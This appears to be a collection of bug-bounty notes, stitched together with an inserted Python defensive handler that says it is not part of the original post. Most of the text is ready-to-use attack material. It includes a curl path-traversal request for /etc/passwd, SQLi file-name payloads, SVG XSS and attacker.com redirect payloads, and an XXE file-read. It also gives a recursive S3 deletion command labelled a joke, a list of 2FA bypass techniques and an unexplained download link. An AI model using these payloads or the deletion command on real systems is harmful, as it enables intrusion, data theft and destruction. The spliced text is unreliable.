Some Web Application Penetration testing or Bug Bounty notes :)
Download link: https://mega.nz/file/Jv4UyRZL#6ZuyrmCzfgDcwiKggXBJVshCTPrNwLJ3C6DXg_cfBTE
echo REDACTED.COM | cariddi | grep js | tee js_files | httpx -mc 200 | nuclei -tags aws,amazon
aws s3 ls s3://REDACTEDCOM.s3.amazonaws.com
(If you still don't know the exact S3 Bucket you can use echo REDACTED.COM | cariddi -e -s -info)
aws s3 rm s3://REDACTEDCOM.s3.amazonaws.com --recursive
(It's a joke, don't be a bad guy and report that...)
Keep checking my old Posts to continue your learning Process!
Brut Security | Discussion
Community Discussion
🚨 🚨 🚨 Too many people miss critical vulnerabilities because they assume a GET request can't have a body! 🚨 🚨 🚨
This is how you can send such a request using #curl :
$ curl 'target:1234/download?filename=TEST' --data 'filename=../../../../../../../etc/passwd' -X GET
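A server-side guard against the request shown above, as an added example that is not part of the original post. It assumes a download handler that receives the method, raw query string and raw body; `BASE_DIR`, `resolve_download`, `is_rejected` and `Rejected` are hypothetical names.

```python
import os
from urllib.parse import parse_qs

BASE_DIR = "/srv/app/downloads"  # hypothetical download root (assumption)
FORM = "application/x-www-form-urlencoded"

class Rejected(Exception):
    """The download request must be refused."""

def resolve_download(method, query_string, body=b"", content_type=""):
    """Return the absolute path to serve, or raise Rejected."""
    # 1. A GET/HEAD body has no defined meaning for this endpoint. Refuse it
    #    rather than let a body parameter shadow the query parameter that
    #    upstream checks (WAF, route validation, logging) actually looked at.
    if method in ("GET", "HEAD") and body:
        raise Rejected("request body not allowed on " + method)

    # 2. Collect the parameter from every source the framework could merge,
    #    and require exactly one non-empty value overall.
    values = parse_qs(query_string, keep_blank_values=True).get("filename", [])
    if content_type.startswith(FORM):
        form = parse_qs(body.decode("utf-8", "replace"), keep_blank_values=True)
        values += form.get("filename", [])
    if len(values) != 1 or not values[0] or "\x00" in values[0]:
        raise Rejected("filename must be supplied exactly once")

    # 3. Canonicalise, then confirm the result is still under the root.
    base = os.path.realpath(BASE_DIR)
    target = os.path.realpath(os.path.join(base, values[0]))
    if target == base or os.path.commonpath([base, target]) != base:
        raise Rejected("path escapes download root")
    return target

def is_rejected(*args):
    """True when resolve_download refuses the request."""
    try:
        resolve_download(*args)
    except Rejected:
        return True
    return False

if __name__ == "__main__":
    # Constructed requests mirroring the curl command in the post.
    traversal = b"filename=../../../../../../../etc/passwd"
    print(is_rejected("GET", "filename=TEST", traversal, FORM))   # GET with body
    print(is_rejected("POST", "filename=TEST", traversal, FORM))  # duplicate param
    print(is_rejected("POST", "", traversal, FORM))               # traversal only
    print(resolve_download("GET", "filename=TEST"))               # accepted
```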
Now you can detect phishing websites quickly with Nuclei❤
nuclei -l websites_Possible_Phishing -tags phishing -itags phishing
SQLi
'sleep(20).jpg
sleep(25)-- -.jpg
Path traversal
../../etc/passwd/logo.png
../../../logo.png
XSS
-> Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"
-> Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;
-> Upload using .svg file
<svg xmlns="w3.org/2000/svg" onload="alert(1)"/>
-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("HolyBugx XSS");
</script>
</svg>
Open redirect
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
XXE ⏳
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1">
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>
2FA Bypass Techniques
1. Response manipulation
2. Status code manipulation
3. 2FA code reusability
4. 2FA code leakage
5. Lack of brute-force protection
6. Bypassing 2FA with null or 000000
8. Missing 2FA code integrity validation
9. Handling of Previous Sessions